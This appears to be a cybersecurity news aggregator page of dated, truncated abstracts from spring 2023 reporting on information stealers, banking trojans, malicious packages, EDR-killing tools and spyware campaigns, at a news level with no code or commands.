Atomic macOS Stealer is a new information stealer targeting macOS that is advertised on Telegram for $1,000 per month. Cyble Research and Intelligence Labs (CRIL) recently discovered a Telegram channel advertising a new information-stealing malware,...Security Affairs
April 28, 2023
Atomic - New macOS Info-stealer in Town Full Text
Abstract
Private Telegram channels are being abused by cybercriminals to sell a new macOS malware variant that can infect over 50 cryptocurrency extensions to steal data. Dubbed Atomic, the malware author provides its buyers a ready-to-use web panel for easy victim management, a cryptocurrency checker, a Me ...Cyware
April 28, 2023
New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets Full Text
Abstract
Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password," Cyble researchers said in a technical report. Among other features include its ability to extract data from web browsers and cryptocurrency wallets like Atomic, Binance, Coinomi, Electrum, and Exodus. Threat actors who purchase the stealer from its developers are also provided a ready-to-use web panel for managing the victims. The malware takes the form of an unsigned disk image file (Setup.dmg) that, when executed, urges the victim to enter their system password on a bogus prompt to escalate privileges and carry out its malicious activities --The Hacker News
April 28, 2023
New TrafficStealer Malware Monetizes Network Traffic Full Text
Abstract
TrendMicro uncovered a new risk to Docker containers from a piece of malware called TrafficStealer. It influences web traffic and ad interaction via the use of containers to generate illegal income. TrafficStealer uses a combination of two techniques: web crawling and click simulation. Experts ...Cyware
April 28, 2023
ViperSoftX InfoStealer Adopts Sophisticated Techniques to Avoid Detection Full Text
Abstract
A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called ViperSoftX. ViperSoftX was first documented by Fortinet in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension capable of siphoning cryptocurrencies from wallet applications. Now a new analysis from Trend Micro has revealed the malware's adoption of "more sophisticated encryption and basic anti-analysis techniques, such as byte remapping and web browser communication blocking." The arrival vector of ViperSoftX is typically a software crack or a key generator (keygen), while also employing actual non-malicious software like multimedia editors and system cleaner apps as "carriers." One of the key steps performed by the malware before downloading a first-stage PoThe Hacker News
April 27, 2023
LimeRAT Malware Analysis: Extracting the Config Full Text
Abstract
Remote Access Trojans (RATs) have taken the third leading position in ANY.RUN's Q1 2023 report on the most prevalent malware types, making it highly probable that your organization may face this threat. Though LimeRAT might not be the most well-known RAT family, its versatility is what sets it apart. Capable of carrying out a broad spectrum of malicious activities, it excels not only in data exfiltration, but also in creating DDoS botnets and facilitating crypto mining. Its compact footprint allows it to elude endpoint detection systems, making it a stealthy adversary. Interestingly, LimeRAT shares similarities with njRAT, which ANY.RUN ranks as the third most popular malware family in terms of uploads during Q1 2023. ANY.RUN researchers have recently conducted an in-depth analysis of a LimeRAT sample and successfully extracted its configuration. In this article, we'll provide a brief overview of that analysis. Collected artifacts SHA1 14836dd608efb4a0c552a4f370eThe Hacker News
April 26, 2023
Google Ads Abused to Distribute New LOBSHOT Malware Full Text
Abstract
Elastic Security Labs has uncovered LOBSHOT, a previously unknown hVNC malware, that impersonates legitimate software for financial gain and is promoted through malvertising, such as Google Ads, to extend their reach and perpetrate their attacks. It targets 32 Chrome extensions, nine Edge wallet ex ...Cyware
April 26, 2023
Charming Kitten’s New BellaCiao Malware Discovered in Multi-Country Attacks Full Text
Abstract
The prolific Iranian nation-state group known as Charming Kitten is actively targeting multiple victims in the U.S., Europe, the Middle East and India with a novel malware dubbed BellaCiao, adding to its ever-expanding list of custom tools. Discovered by Bitdefender Labs, BellaCiao is a "personalized dropper" that's capable of delivering other malware payloads onto a victim machine based on commands received from an actor-controlled server. "Each sample collected was tied up to a specific victim and included hard-coded information such as company name, specially crafted subdomains, or associated public IP address," the Romanian cybersecurity firm said in a report shared with The Hacker News. Charming Kitten, also known as APT35, Cobalt Illusion, Educated Manticore, ITG18, Mint Sandstorm (née Phosphorus), TA453, and Yellow Garuda, is an Iranian state-sponsored APT group associated with the Islamic Revolutionary Guard Corps (IRGC). Over the years, theThe Hacker News
April 24, 2023
AuKill tool uses BYOVD attack to disable EDR software Full Text
Abstract
Ransomware operators use the AuKill tool to disable EDR software through Bring Your Own Vulnerable Driver (BYOVD) attack. Sophos researchers reported that threat actors are using a previously undocumented defense evasion tool, dubbed AuKill, to...Security Affairs
April 24, 2023
EvilExtractor, a new All-in-One info stealer appeared on the Dark Web Full Text
Abstract
EvilExtractor is a new "all-in-one" info stealer for Windows that is being advertised for sale on dark web cybercrime forums. Fortinet FortiGuard Labs researchers discovered a new "all-in-one" info stealer for Windows, dubbed EvilExtractor (sometimes...Security Affairs
April 24, 2023
AuKill Exploits Process Explorer Utility via BYOVD, Deploys Ransomware Full Text
Abstract
Sophos X-Ops uncovered a defense evasion tool called AuKill. The tool exploits an outdated version of the driver used by version 16.32 of the Microsoft utility Process Explorer to disable EDR processes to deploy either a backdoor or ransomware on the targeted system. Since the beginning of 2023, th ...Cyware
April 24, 2023
New All-in-One “EvilExtractor” Stealer for Windows Systems Surfaces on the Dark Web Full Text
Abstract
A new "all-in-one" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems. "It includes several modules that all work via an FTP service," Fortinet FortiGuard Labs researcher Cara Lin said. "It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server." The network security company said it observed a surge in attacks spreading the malware in the wild in March 2023, with a majority of the victims located in Europe and the U.S. While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer. The attack tool is being sold by an actor named Kodex on cybercrime forums like Cracked dating back to October 22, 2022. It's continually updated andThe Hacker News
April 24, 2023
Package names repurposed to push malware on PyPI Full Text
Abstract
At the beginning of March, ReversingLabs researchers encountered a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.Cyware
April 22, 2023
Infoblox Uncovers DNS Malware Toolkit & Urges Companies to Block Malicious Domains Full Text
Abstract
Infoblox discovered activity from the remote access trojan (RAT) Pupy active in multiple enterprise networks in early April 2023. This C2 communication went undiscovered since April 2022.Cyware
April 22, 2023
Abandoned Eval PHP WordPress plugin abused to backdoor websites Full Text
Abstract
Threat actors were observed installing the abandoned Eval PHP plugin on compromised WordPress sites for backdoor deployment. Researchers from Sucuri warned that threat actors are installing the abandoned Eval PHP plugin on compromised WordPress sites...Security Affairs
April 20, 2023
‘AuKill’ EDR killer malware abuses Process Explorer driver Full Text
Abstract
The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.Cyware
April 20, 2023
Giving a Face to the Malware Proxy Service ‘Faceless’ – Krebs on Security Full Text
Abstract
For less than a dollar per day, Faceless customers can route their malicious web traffic through tens of thousands of compromised systems advertised on the proxy service.Cyware
April 19, 2023
Goldoson Library Infects Popular Apps with Adware Full Text
Abstract
A recently detected Android malware named 'Goldoson' has made its way into Google Play and has been found in 60 legitimate applications, which have been downloaded a total of 100 million times. Users are suggested to always perform due diligence, especially for new apps without good reviews.Cyware
April 18, 2023
YouTube Videos Distributing Aurora Stealer Malware via Highly Evasive Loader Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of a highly evasive loader named "in2al5d p3in4er" (read: invalid printer) that's used to deliver the Aurora information stealer malware. "The in2al5d p3in4er loader is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) technique," cybersecurity firm Morphisec said in a report shared with The Hacker News. Aurora is a Go-based information stealer that emerged on the threat landscape in late 2022. Offered as a commodity malware to other actors, it's distributed through YouTube videos and SEO-poised fake cracked software download websites. Clicking the links present in YouTube video descriptions redirects the victim to decoy websites where they are enticed into downloading the malware under the garb of a seemingly-legitimate utility. The loader analyzed by Morphisec is designed to query the vendor ID of the graphics card installThe Hacker News
April 18, 2023
Goldoson Android Malware Infects Over 100 Million Google Play Store Downloads Full Text
Abstract
A new Android malware strain named Goldoson has been detected in the official Google Play Store spanning more than 60 legitimate apps that collectively have over 100 million downloads. An additional eight million installations have been tracked through ONE store, a leading third-party app storefront in South Korea. The rogue component is part of a third-party software library used by the apps in question and is capable of gathering information about installed apps, Wi-Fi and Bluetooth-connected devices, and GPS locations. "Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user's consent," McAfee security researcher SangRyol Ryu said in a report published last week. What's more, it includes the ability to stealthily load web pages, a feature that could be abused to load ads for financial profit. It achieves this by loading HTML code in a hidden WebView and driving traffic to thThe Hacker News
April 18, 2023
in2al5d p3in4er is Almost Completely Undetectable Full Text
Abstract
The component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader we named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using an advanced anti-VM technique.Cyware
April 17, 2023
Understanding the Threat of Titan Stealer Malware Full Text
Abstract
The malware spreads through methods like phishing, malicious ads, and cracked software. It also uses a technique called process hollowing to inject the malicious code into a legitimate process called AppLaunch.exe.Cyware
April 17, 2023
Israeli Spyware Vendor QuaDream to Shut Down Following Citizen Lab and Microsoft Expose Full Text
Abstract
Israeli spyware vendor QuaDream is allegedly shutting down its operations in the coming days, less than a week after its hacking toolset was exposed by Citizen Lab and Microsoft. The development was reported by the Israeli business newspaper Calcalist, citing unnamed sources, adding the company "hasn't been fully active for a while" and that it "has been in a difficult situation for several months." The company's board of directors are looking to sell off its intellectual property, the report further added. News of the purported shutdown comes as the firm's spyware framework – dubbed REIGN – was outed as having been used against journalists, political opposition figures, and NGO workers across North America, Central Asia, Southeast Asia, Europe, and the Middle East. Microsoft described REIGN as a "suite of exploits, malware, and infrastructure designed to exfiltrate data from mobile devices." The attacks entailed the exploitation ofThe Hacker News
April 17, 2023
New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware Full Text
Abstract
A new QBot malware campaign is leveraging hijacked business correspondence to trick unsuspecting victims into installing the malware, new findings from Kaspersky reveal. The latest activity, which commenced on April 4, 2023, has primarily targeted users in Germany, Argentina, Italy, Algeria, Spain, the U.S., Russia, France, the U.K., and Morocco. QBot (aka Qakbot or Pinkslipbot) is a banking trojan that's known to be active since at least 2007. Besides stealing passwords and cookies from web browsers, it doubles up as a backdoor to inject next-stage payloads such as Cobalt Strike or ransomware. Distributed via phishing campaigns, the malware has seen constant updates during its lifetime that pack in anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. It has also emerged as the most prevalent malware for the month of March 2023, per Check Point. "Early on, it was distributed through infected websites and pirated software," Kaspersky reThe Hacker News
April 17, 2023
Experts warn of an emerging Python-based credential harvester named Legion Full Text
Abstract
Legion is an emerging Python-based credential harvester and hacking tool that allows operators to break into various online services. Cado Labs researchers recently discovered a new Python-based credential harvester and hacking tool, named Legion,...Security Affairs
April 17, 2023
New Zaraza Bot Credential-Stealer Sold on Telegram Targeting 38 Web Browsers Full Text
Abstract
A novel credential-stealing malware called Zaraza bot is being offered for sale on Telegram while also using the popular messaging service as a command-and-control (C2). "Zaraza bot targets a large number of web browsers and is being actively distributed on a Russian Telegram hacker channel popular with threat actors," cybersecurity company Uptycs said in a report published last week. "Once the malware infects a victim's computer, it retrieves sensitive data and sends it to a Telegram server where the attackers can access it immediately." A 64-bit binary file compiled using C#, Zaraza bot is designed to target as many as 38 different web browsers, including Google Chrome, Microsoft Edge, Opera, AVG Browser, Brave, Vivaldi, and Yandex. It's also equipped to capture screenshots of the active window. It's the latest example of malware that's capable of capturing login credentials associated with online bank accounts, cryptocurrency walletsThe Hacker News
April 15, 2023
Legion: A Python-Based Hacking Tool Targets Websites and Web Services Full Text
Abstract
The cybercriminal group, which goes by the moniker "Forza Tools," was seen offering Legion - a Python-based credential harvester and SMTP hijacking tool. The malware targets online email services for phishing and spam attacks. Experts suggest it is likely based on the AndroxGhOst malware and has se ...Cyware
April 15, 2023
New Android malicious library Goldoson found in 60 apps +100M downloads Full Text
Abstract
A new Android malware named Goldoson was distributed through 60 legitimate apps on the official Google Play store. The Goldoson library was discovered by researchers from McAfee’s Mobile Research Team, it collects lists of applications installed ... (Security Affairs)
April 14, 2023
Privacy-invasive and Clicker Android Adware found in popular apps in South Korea Full Text
Abstract
Some apps were removed from Google Play while others were updated by the official developers. Users are encouraged to update the apps to the latest version to remove the identified threat from their devices. (Cyware)
April 13, 2023
Qbot Takes New Distribution Method to Infect Korean Users Full Text
Abstract
AhnLab has discovered a fresh attack strategy that spreads Qbot malware through malevolent PDF attachments added to replies or forwarded messages in already-existing emails. Qbot or Qakbot follows a destructive attack pattern, shifting from one tactic to another for maximum profits. (Cyware)
April 13, 2023
Malicious ChatGPT & Google Bard Installers Distribute RedLine Stealer Full Text
Abstract
When a victim installs a malicious file from one of these sponsored ads, their device is hijacked by the RedLine infostealer, which can then steal confidential data, disrupt critical infrastructure, and compromise financial accounts. (Cyware)
April 13, 2023
New Python-Based “Legion” Hacking Tool Emerges on Telegram Full Text
Abstract
An emerging Python-based credential harvester and a hacking tool named Legion is being marketed via Telegram as a way for threat actors to break into various online services for further exploitation. Legion, according to Cado Labs, includes modules to enumerate vulnerable SMTP servers, conduct remote code execution (RCE) attacks, exploit unpatched versions of Apache, and brute-force cPanel and WebHost Manager (WHM) accounts. The malware is said to bear similarities to another malware family called AndroxGh0st that was first documented by cloud security services provider Lacework in December 2022. Cybersecurity firm SentinelOne, in an analysis published late last month, revealed that AndroxGh0st is part of a comprehensive toolset called AlienFox that's offered to threat actors to steal API keys and secrets from cloud services. "Legion appears to be part of an emerging generation of cloud-focused credential harvester/spam utilities," security researcher Matt Muir ... (The Hacker News)
April 12, 2023
Israel-based Spyware Firm QuaDream Targets High-Risk iPhones with Zero-Click Exploit Full Text
Abstract
Threat actors using hacking tools from an Israeli surveillanceware vendor named QuaDream targeted at least five members of civil society in North America, Central Asia, Southeast Asia, Europe, and the Middle East. According to findings from a group of researchers from the Citizen Lab, the spyware campaign was directed against journalists, political opposition figures, and an NGO worker in 2021. The names of the victims were not disclosed. It's also suspected that the company abused a zero-click exploit dubbed ENDOFDAYS in iOS 14 to deploy spyware as a zero-day in version 14.4 and 14.4.2. There is no evidence that the exploit has been used after March 2021. ENDOFDAYS "appears to make use of invisible iCloud calendar invitations sent from the spyware's operator to victims," the researchers said, adding the .ics files contain invites to two backdated and overlapping events so as to not alert the users. The attacks are suspected to have leveraged a quirk in iOS 1 ... (The Hacker News)
April 11, 2023
Malware Disguised as Document from Ukraine’s Energoatom Delivers Havoc Demon Backdoor Full Text
Abstract
When opened, it displays an image instructing the user to enable Word’s macro code execution to reveal information supposedly protected by M.E. Doc (My Electronic Document). (Cyware)
April 11, 2023
Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers. The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server. The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users' cryptocurrency accounts. "The payload used a very rare obfuscation technique, called '.NET AoT compilation,' which is a lot more stealthy than using 'off the shelf' obfuscators while still making the binary hard to reverse engineer," JFrog told The Hacker News in a statement. .NET AoT compilation is an optimization technique that allows apps to be ahead-of-time c ... (The Hacker News)
April 9, 2023
Hackers Hide Backdoors Behind Malicious Self-Extracting Archives Full Text
Abstract
Malicious actors are incorporating harmful features into self-extracting archives created with WinRAR, which contain benign decoy files. This tactic enables them to implant backdoors on the targeted system without arousing any suspicion. An apparently empty SFX archive file can be missed by technol ... (Cyware)
April 9, 2023
CryptoClippy: New Clipper Malware That Targets Portuguese Users Full Text
Abstract
Cybercriminals launched a malvertising campaign involving malware named CryptoClippy to pilfer cryptocurrency from users in Portugal. Discovered by Palo Alto Networks Unit 42, the campaign uses SEO poisoning techniques to push users looking for "WhatsApp web" to fake domains containing malicious so ... (Cyware)
April 9, 2023
FusionCore - An Emerging Malware-as-a-Service Group in Europe Full Text
Abstract
Active since November, FusionCore acts as a one-stop-shop for cybercriminals; it offers services such as malware-as-a-subscription, hacking for hire, and ransomware. It has rolled out a ransomware affiliate program as well called AnthraXXXLocker. Typhon Reborn is one example of the group's propriet ... (Cyware)
April 7, 2023
Typhon Reborn V2 Enhances Evasion Capabilities Full Text
Abstract
Crypto miner/stealer for hire, Typhon Stealer, received a new update, disclosed Palo Alto Networks. The new variant boasts enhanced anti-analysis techniques, as well as other stealing and file-grabber features. The malware leverages Telegram’s API and infrastructure to exfiltrate all stolen data. (Cyware)
April 6, 2023
BatLoader Malware Dropper Continues to Pose a Threat to Organizations in 2023 Full Text
Abstract
BatLoader can modify Windows UAC prompt, disable Windows Defender notifications, disable Task Manager, prevent users from accessing Windows registry tools, disable the Run command, and modify the display timeout. (Cyware)
April 05, 2023
CryptoClippy: New Clipper Malware Targeting Portuguese Cryptocurrency Users Full Text
Abstract
Portuguese users are being targeted by a new malware codenamed CryptoClippy that's capable of stealing cryptocurrency as part of a malvertising campaign. The activity leverages SEO poisoning techniques to entice users searching for "WhatsApp web" to rogue domains hosting the malware, Palo Alto Networks Unit 42 said in a new report published today. CryptoClippy, a C-based executable, is a type of cryware known as clipper malware that monitors a victim's clipboard for content matching cryptocurrency addresses and substitutes them with a wallet address under the threat actor's control. "The clipper malware uses regular expressions (regexes) to identify what type of cryptocurrency the address pertains to," Unit 42 researchers said. "It then replaces the clipboard entry with a visually similar but adversary-controlled wallet address for the appropriate cryptocurrency. Later, when the victim pastes the address from the clipboard to condu ... (The Hacker News)
April 05, 2023
Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques Full Text
Abstract
The threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis. The new version is offered for sale on the criminal underground for $59 per month, $360 per year, or alternatively, for $540 for a lifetime subscription. "The stealer can harvest and exfiltrate sensitive information and uses the Telegram API to send stolen data to attackers," Cisco Talos researcher Edmund Brumaghin said in a Tuesday report. Typhon was first documented by Cyble in August 2022, detailing its myriad features, including hijacking clipboard content, capturing screenshots, logging keystrokes, and stealing data from crypto wallet, messaging, FTP, VPN, browser, and gaming apps. Based on another stealer malware called Prynt Stealer, Typhon is also capable of delivering the XMRig cryptocurrency miner. In November 2022, Palo Alto Networks Unit 42 unearthed an ... (The Hacker News)
April 04, 2023
New Rilide Malware Targeting Chromium-Based Browsers to Steal Cryptocurrency Full Text
Abstract
Chromium-based web browsers are the target of a new malware called Rilide that masquerades as a seemingly legitimate extension to harvest sensitive data and siphon cryptocurrency. "Rilide malware is disguised as a legitimate Google Drive extension and enables threat actors to carry out a broad spectrum of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges," Trustwave SpiderLabs Research said in a report shared with The Hacker News. What's more, the stealer malware can display forged dialogs to deceive users into entering a two-factor authentication code to withdraw digital assets. Trustwave said it identified two different campaigns involving Ekipa RAT and Aurora Stealer that led to the installation of the malicious browser extension. While Ekipa RAT is distributed via booby-trapped Microsoft Publisher files, rogue Google Ads act as t ... (The Hacker News)
April 4, 2023
Rilide Stealer Delivered via Malicious Browser Extension to Siphon Cryptocurrency Full Text
Abstract
Trustwave SpiderLabs uncovered a new strain of malware that it dubbed Rilide, which targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera. (Cyware)
April 03, 2023
Crypto-Stealing OpcJacker Malware Targets Users with Fake VPN Service Full Text
Abstract
A piece of new information-stealing malware called OpcJacker has been spotted in the wild since the second half of 2022 as part of a malvertising campaign. "OpcJacker's main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes," Trend Micro researchers Jaromir Horejsi and Joseph C. Chen said. The initial vector of the campaign involves a network of fake websites advertising seemingly innocuous software and cryptocurrency-related applications. The February 2023 campaign specifically singled out users in Iran under the pretext of offering a VPN service. The installer files act as a conduit to deploy OpcJacker, which is also capable of delivering next-stage payloads such as NetSupport RAT and a hidden virtual network computing (hVNC) variant for remote access. OpcJacker is concealed using a crypter known as Babadeda an ... (The Hacker News)
March 30, 2023
DBatLoader Sweeps European Countries With Multiple Malware Payloads Full Text
Abstract
A new phishing campaign has surfaced to drop Remcos RAT and Formbook malware through DBatLoader malware loader, revealed Zscaler researchers. The campaign is aimed at compromising systems in Europe. Actors also leverage a multi-layered obfuscated HTML file and OneNote attachments to propagate the D ... (Cyware)
March 30, 2023
New AlienFox toolkit harvests credentials for tens of cloud services Full Text
Abstract
AlienFox is a novel comprehensive toolset for harvesting credentials for multiple cloud service providers, SentinelLabs reported. AlienFox is a new modular toolkit that allows threat actors to harvest credentials for multiple cloud service providers. AlienFox ... (Security Affairs)
March 30, 2023
New Mélofée Linux malware linked to Chinese APT groups Full Text
Abstract
ExaTrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée, ... (Security Affairs)
March 30, 2023
AlienFox Malware Targets API Keys and Secrets from AWS, Google, and Microsoft Cloud Services Full Text
Abstract
A new "comprehensive toolset" called AlienFox is being distributed on Telegram as a way for threat actors to harvest credentials from API keys and secrets from popular cloud service providers. "The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for crypto mining, in order to enable and expand subsequent campaigns," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. The cybersecurity company characterized the malware as highly modular and constantly evolving to accommodate new features and performance improvements. The primary use of AlienFox is to enumerate misconfigured hosts via scanning platforms like LeakIX and SecurityTrails, and subsequently leverage various scripts in the toolkit to extract credentials from configuration files exposed on the servers. Specifically, it entails searching for susceptible servers associated with popular web framewor ... (The Hacker News)
March 30, 2023
NullMixer Campaign Delivers New Polymorphic Loaders Full Text
Abstract
Researchers spotted a new malware operation, named NullMixer, that hit over 8,000 targets within a week, with a special focus on North America, Italy, and France. The attackers use SEO poisoning, along with social engineering tactics to lure their potential victims, consisting mostly of IT personne ... (Cyware)
March 29, 2023
Mélofée: Researchers Uncover New Linux Malware Linked to Chinese APT Groups Full Text
Abstract
An unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers. French cybersecurity firm ExaTrack, which found three samples of the previously documented malicious software that date back to early 2022, dubbed it Mélofée. One of the artifacts is designed to drop a kernel-mode rootkit that's based on an open source project referred to as Reptile. "According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64," the company said in a report. "The rootkit has a limited set of features, mainly installing a hook designed for hiding itself." Both the implant and the rootkit are said to be deployed using shell commands that download an installer and a custom binary package from a remote server. The installer takes the binary package as an argument and then extracts the rootkit as well as a server implant module that's currently under active development. Mélofé ... (The Hacker News)
March 29, 2023
Spyware Vendors Use 0-days and n-days Against Popular Platforms Full Text
Abstract
In this blog, researchers have shared details about two distinct campaigns that used various 0-day exploits against Android, iOS, and Chrome and were both limited and highly targeted. (Cyware)
March 28, 2023
Trojanized Tor browsers target Russians with crypto-stealing malware Full Text
Abstract
A surge of trojanized Tor Browser installers targets Russians and Eastern Europeans with clipboard-hijacking malware that steals infected users' cryptocurrency transactions. (BleepingComputer)
March 28, 2023
IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery Full Text
Abstract
Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud. IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware. "The well-known IcedID version consists of an initial loader which contacts a Loader [command-and-control] server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot," Proofpoint said in a new report published Monday. One of the new versions is a Lite variant that was previously highlighted as being dropped as a follow-on payload by the Emotet malware in November 2022. Also newly observed in February 2023 is a Forked variant of IcedID. Both these variants are designed to drop what's called a Forked version of IcedID Bot that leaves out the web injects and backconnect functionality that would typic ... (The Hacker News)
March 28, 2023
Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe Full Text
Abstract
A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader. "The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday. The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain. Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments. The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded f ... (The Hacker News)
March 28, 2023
DBatLoader Actively Distributing Malware Targeting European Businesses Full Text
Abstract
The campaign targets manufacturing companies and multiple businesses in European countries through phishing emails. The malicious payload is distributed through WordPress sites with authorized SSL certificates. (Cyware)
March 27, 2023
New MacStealer macOS malware appears in the cybercrime underground Full Text
Abstract
A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. The Uptycs research team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain ... (Security Affairs)
March 27, 2023
New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords Full Text
Abstract
A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices. Dubbed MacStealer, it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs. "MacStealer has the ability to steal documents, cookies from the victim's browser, and login information," Uptycs researchers Shilpesh Trivedi and Pratik Jeware said in a new report. First advertised on online hacking forums at the start of the month, it is still a work in progress, with the malware authors planning to add features to capture data from Apple's Safari browser and the Notes app. In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. It also featur ... (The Hacker News)
March 27, 2023
Updates from the MaaS: new threats delivered through NullMixer Full Text
Abstract
A technical analysis of NullMixer malware operation revealed Italy and France are the favorite European countries from the attackers’ perspective. Executive Summary Our insights into a recent NullMixer malware operation revealed Italy and France ... (Security Affairs)
March 27, 2023
Malicious Python Package uses Unicode support to evade detection Full Text
Abstract
Researchers discovered a malicious package on PyPI that uses Unicode to evade detection while stealing sensitive data. Supply chain security firm Phylum discovered a malicious Python package on the Python Package Index (PyPI) repository that uses ... (Security Affairs)
March 24, 2023
Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data Full Text
Abstract
A malicious Python package on the Python Package Index (PyPI) repository has been found to use Unicode as a trick to evade detection and deploy an info-stealing malware. The package in question, named onyxproxy, was uploaded to PyPI on March 15, 2023, and comes with capabilities to harvest and exfiltrate credentials and other valuable data. It has since been taken down, but not before attracting a total of 183 downloads. According to software supply chain security firm Phylum, the package incorporates its malicious behavior in a setup script that's packed with thousands of seemingly legitimate code strings. These strings include a mix of bold and italic fonts and are still readable and can be parsed by the Python interpreter, only to activate the execution of the stealer malware upon installation of the package. "An obvious and immediate benefit of this strange scheme is readability," the company noted. "Moreover, these visible differences do not prevent ... (The Hacker News)
March 23, 2023
Fake ChatGPT Chrome Browser Extension Caught Hijacking Facebook Accounts Full Text
Abstract
Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack the accounts. The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on, attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023. According to Guardio Labs researcher Nati Tal, the extension is propagated through malicious sponsored Google search results that are designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on. Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate them to a remote server in an encrypted manner. Onc ... (The Hacker News)
March 23, 2023
Nexus: A New Rising Android Banking Trojan Targeting 450 Financial Apps Full Text
Abstract
An emerging Android banking trojan dubbed Nexus has already been adopted by several threat actors to target 450 financial applications and conduct fraud. "Nexus appears to be in its early stages of development," Italian cybersecurity firm Cleafy said in a report published this week. "Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and cryptocurrency services, such as credentials stealing and SMS interception." The trojan, which appeared in various hacking forums at the start of the year, is advertised as a subscription service to its clientele for a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month. However, there are indications that the malware may have been used in real-world attacks as early as June 2022, at least six months before its official announcement on darknet portals. According to security researcher Rohit Bansal (@0xrb) and confirmed by t ... (The Hacker News)
March 23, 2023
Experts published PoC exploit code for Veeam Backup & Replication bug Full Text
Abstract
Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software. ... (Security Affairs)
March 23, 2023
Nexus, an emerging Android banking Trojan targets 450 financial apps Full Text
Abstract
Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed ... (Security Affairs)
March 22, 2023
Emotet Adopts the Trend for OneNote Infection Full Text
Abstract
Security researcher abel took the wraps off Emotet’s new distribution technique that allows it to propagate through Microsoft OneNote email attachments. The operators have a history of deploying malicious macros on infected systems via Microsoft Word and Excel attachments. This new method of infect ... (Cyware)
March 22, 2023
ScarCruft’s Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques Full Text
Abstract
